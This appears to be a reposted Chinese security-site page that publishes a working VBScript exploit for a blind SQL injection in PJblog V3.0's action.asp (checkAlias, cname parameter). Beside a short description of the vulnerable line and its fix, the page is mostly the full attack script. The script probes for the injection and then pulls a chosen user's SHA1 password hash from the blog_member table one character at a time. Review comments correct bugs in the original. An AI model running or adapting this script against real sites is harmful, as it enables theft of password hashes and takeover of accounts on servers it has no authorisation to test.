
PJblog V3.0 0day Vbs版漏洞利用工具exploit

PJblog V3.0 0day Vbs版漏洞利用工具exploit：针对 action.asp 中 checkAlias 动作的 cname 参数 SQL 注入（布尔盲注，根据页面是否返回 check_error 逐位取出目标用户在 blog_member 表中的 SHA1 密码哈希）。本来还算个0day,不过PJblog官方反应速度不错,已经补了。

action.asp
第14行

' Vulnerable statement (action.asp, line 14): the user-controlled "cname"
' request parameter is concatenated straight into the SQL text. Because the
' literal is delimited by double quotes, a value containing a double quote
' closes the literal and the remainder of the value is executed as SQL.
' The exploit below only needs to know whether the query matched a row
' (it watches the response for "check_error"), which turns this into a
' boolean-based blind injection. Remediation: bind cname as a parameter
' (ADODB.Command with a "?" placeholder) instead of building the string,
' or at the very least reject or escape the double-quote character.
strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")

漏洞具体细节请看 http://0kee.com/read.php?tid-908.html

PJblog V3.0 0day Vbs版漏洞利用工具exploit：

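' ---------------------------------------------------------------------------
' Boolean-based blind SQL injection PoC for PJblog V3.0
' (action.asp?action=checkAlias). The "cname" parameter is concatenated into
' a SQL string delimited by double quotes, so a value that ends in a double
' quote lets us append our own conditions. Whether the page answers with
' "check_error" (see IsSuccess) tells us whether the query matched a row; that
' one-bit oracle is used to recover the target user's password hash from
' blog_member one character at a time.
'
' Arguments: <site url> <user name>   (see the usage text below)
' Traffic:   at most 17 GETs per hash position, 40 positions -> up to ~680.
' ---------------------------------------------------------------------------
Dim attackUrl, attackUser, SHA1Charset, strHoleUrl, strResult
Dim n, i, strInject, strPrint, exhausted

If WScript.Arguments.Count <> 2 Then
        WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
        ' The published listing had this literal split across two lines, which
        ' is a syntax error in VBScript; it is a single string here.
        WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"
        WScript.Quit
End If
attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)

' Normalise backslashes to forward slashes and make sure the URL ends in "/".
' (The listing showed Replace(attackUrl,"","/") - an empty search string is a
' no-op in VBScript; the backslash was evidently lost on publication.)
attackUrl = Replace(attackUrl, "\", "/")
If Right(attackUrl, 1) <> "/" Then
        attackUrl = attackUrl & "/"
End If

' Hex digits of a SHA1 hash plus "J" as a sentinel that sorts after "F": the
' inner loop stops at the first candidate that compares greater than the real
' character, so the sentinel guarantees an exit even when that digit is "F".
SHA1Charset = "0123456789ABCDEFJ"
' The trailing double quote closes the SQL literal around 0kee; whatever is
' appended afterwards becomes part of the WHERE clause.
strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""

' Calibrate the oracle: an always-true tail must "match", an always-false one must not.
If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then
        WScript.Echo "恭喜!存在漏洞"
Else
        WScript.Echo "没有检测到漏洞"
        WScript.Quit
End If

' Prefix comparison: for each position try candidates in ascending order.
' "mem_password >= prefix & c" stays true until c passes the real character,
' and the previous candidate is the answer. String ordering (and thus case
' handling) follows the database's collation - presumably Jet/Access here,
' which compares case-insensitively by default, so hex case is not significant.
strResult = ""
exhausted = False
For n = 1 To 40
        For i = 1 To 17
                strInject = strHoleUrl & " Or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"
                If Not IsSuccess(strInject) Then
                        If i = 1 Then
                                ' Not even the smallest candidate matched: the user does
                                ' not exist or the stored value is shorter than expected.
                                ' The original called Mid(SHA1Charset, 0, 1) here, which
                                ' raises "Invalid procedure call or argument".
                                exhausted = True
                        Else
                                strResult = strResult & Mid(SHA1Charset, i - 1, 1)
                        End If
                        Exit For
                End If
                strPrint = Chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
                WScript.StdOut.Write strPrint
        Next
        If exhausted Then Exit For
Next
If exhausted Then
        WScript.Echo Chr(13) & Chr(10) & "提前结束:没有更多字符可以提取(用户可能不存在),已得到: " & strResult
End If
WScript.Echo Chr(13) & Chr (10) & "Done!"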
' Fetch PostUrl with a synchronous GET and return the body as a string.
' Despite the name this is a GET: the whole injection payload travels in the
' query string. The raw bytes are decoded by bytes2BSTR (DBCS-aware).
' NOTE(review): no timeout is set (setTimeouts) and the HTTP status is never
' inspected, so a hung target stalls the caller and an error page is returned
' like any other body.
Function PostData(PostUrl)
        Dim req, rawBody
        Set req = CreateObject("msxml2.serverXMLHTTP")
        req.Open "GET", PostUrl, False
        req.Send
        rawBody = req.ResponseBody
        Set req = Nothing
        PostData = bytes2BSTR(rawBody)
End Function
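' Convert a raw byte string (e.g. ResponseBody) into a VBScript string.
' Bytes below &H80 are taken as ASCII; a byte of &H80 or above is treated as
' the lead byte of a two-byte DBCS sequence and the pair is fed to Chr as one
' 16-bit code. Chr() with a value above 255 only yields a character on a DBCS
' system locale (GBK for these pages) - on a single-byte locale it raises an
' error; the original relied on the same behaviour.
' Fix over the original: a lone lead byte at the very end of the input (a
' truncated response) used to call AscB on an empty MidB result and fail with
' "Invalid procedure call"; it is now kept as a single character.
Function bytes2BSTR(vIn)
        Dim out, pos, total, lead, trail
        out = ""
        total = LenB(vIn)
        pos = 1
        Do While pos <= total
                lead = AscB(MidB(vIn, pos, 1))
                If lead < &H80 Then
                        out = out & Chr(lead)
                        pos = pos + 1
                ElseIf pos < total Then
                        trail = AscB(MidB(vIn, pos + 1, 1))
                        out = out & Chr(CLng(lead) * &H100 + CInt(trail))
                        pos = pos + 2
                Else
                        ' Trailing lead byte with no trail byte: pass it through
                        ' instead of reading past the end of the input.
                        out = out & Chr(lead)
                        pos = pos + 1
                End If
        Loop
        bytes2BSTR = out
End Function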
' Oracle for the blind injection: fetch PostUrl and report whether the body
' contains "check_error". The calibration at the top of the script treats
' that marker as "the alias query matched a row", so True presumably means
' the injected condition evaluated true. HTTP errors are not distinguished
' from a non-match: any body without the marker counts as False.
Function IsSuccess(PostUrl)
        ' strData stays an undeclared (global) variable, as in the original.
        strData = PostData(PostUrl)
        'WScript.Echo strData
        IsSuccess = (InStr(strData, "check_error") > 0)
        'WScript.Sleep 500 'give the target a short pause between requests
End Function

用法:Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名（网址带 http://，末尾的 / 会自动补上；脚本先用 or "1"="1 / and "1"="2 两个请求确认注入点，再对 40 位哈希逐位探测，每位最多 17 次请求。只应对自己有授权测试的站点使用。）

来源:WEB安全手册
